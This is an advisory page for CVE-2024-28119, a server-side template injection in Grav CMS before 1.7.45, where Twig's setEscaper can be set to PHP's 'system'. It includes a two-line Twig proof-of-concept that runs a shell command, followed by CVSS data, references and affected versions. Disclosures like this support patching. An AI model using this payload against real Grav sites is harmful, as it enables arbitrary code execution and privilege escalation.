Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS0ybTd4LWM3cHgtaHA1OM4AA6Oy
Server Side Template Injection (SSTI) via Twig escape handler
Summary
Due to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands.
Details
https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99
/**
* Defines a new escaper to be used via the escape filter.
*
* @param string $strategy The strategy name that should be used as a strategy in the escape call
* @param callable $callable A valid PHP callable
*/
public function setEscaper($strategy, callable $callable)
{
$this->escapers[$strategy] = $callable;
}
Twig supports the functionality to redefine the escape function through the setEscaper method.
However, that method is not originally exposed to the twig environment, but it is accessible through the payload below.
{{ grav.twig.twig.extensions.core.setEscaper('a','a') }}
At this point, it accepts callable type as an argument, but as there is no validation for the $callable variable, attackers can set dangerous functions like system as the escaper function.
PoC
{{ var_dump(grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter')) }}
{{ var_dump(['id'] | escape('system', 'system')) }}
Impact
Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.
As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ybTd4LWM3cHgtaHA1OM4AA6Oy
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 8 months ago
Updated: 8 months ago
CVSS Score: 7.2
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-2m7x-c7px-hp58, CVE-2024-28119
References:
- https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58
- https://nvd.nist.gov/vuln/detail/CVE-2024-28119
- https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe
- https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99
- https://github.com/advisories/GHSA-2m7x-c7px-hp58
Blast Radius: 6.9
Affected Packages
packagist:getgrav/grav
Dependent packages: 2Dependent repositories: 9
Downloads: 74,808 total
Affected Version Ranges: < 1.7.45
Fixed in: 1.7.45
All affected versions: 0.8.0, 0.9.0, 0.9.1, 0.9.2, 0.9.3, 0.9.4, 0.9.5, 0.9.6, 0.9.7, 0.9.8, 0.9.9, 0.9.10, 0.9.11, 0.9.12, 0.9.13, 0.9.14, 0.9.15, 0.9.16, 0.9.17, 0.9.18, 0.9.19, 0.9.20, 0.9.21, 0.9.22, 0.9.23, 0.9.24, 0.9.25, 0.9.26, 0.9.27, 0.9.28, 0.9.29, 0.9.30, 0.9.31, 0.9.32, 0.9.33, 0.9.34, 0.9.35, 0.9.36, 0.9.37, 0.9.38, 0.9.39, 0.9.40, 0.9.41, 0.9.42, 0.9.43, 0.9.44, 0.9.45, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.9, 1.0.10, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7, 1.1.8, 1.1.9, 1.1.10, 1.1.11, 1.1.12, 1.1.13, 1.1.14, 1.1.15, 1.1.16, 1.1.17, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.3.7, 1.3.8, 1.3.9, 1.3.10, 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 1.4.5, 1.4.6, 1.4.7, 1.4.8, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.5.6, 1.5.7, 1.5.8, 1.5.9, 1.5.10, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.4, 1.6.5, 1.6.6, 1.6.7, 1.6.8, 1.6.9, 1.6.10, 1.6.11, 1.6.12, 1.6.13, 1.6.14, 1.6.15, 1.6.16, 1.6.17, 1.6.18, 1.6.19, 1.6.20, 1.6.21, 1.6.22, 1.6.23, 1.6.24, 1.6.25, 1.6.26, 1.6.27, 1.6.28, 1.6.29, 1.6.30, 1.6.31, 1.7.0, 1.7.1, 1.7.3, 1.7.4, 1.7.5, 1.7.6, 1.7.7, 1.7.8, 1.7.9, 1.7.10, 1.7.12, 1.7.13, 1.7.14, 1.7.15, 1.7.16, 1.7.17, 1.7.18, 1.7.19, 1.7.20, 1.7.21, 1.7.22, 1.7.23, 1.7.24, 1.7.25, 1.7.26, 1.7.27, 1.7.28, 1.7.29, 1.7.30, 1.7.31, 1.7.32, 1.7.33, 1.7.34, 1.7.35, 1.7.36, 1.7.37, 1.7.38, 1.7.39, 1.7.40, 1.7.41, 1.7.42, 1.7.43, 1.7.44
All unaffected versions: 1.7.45, 1.7.46, 1.7.47, 1.7.48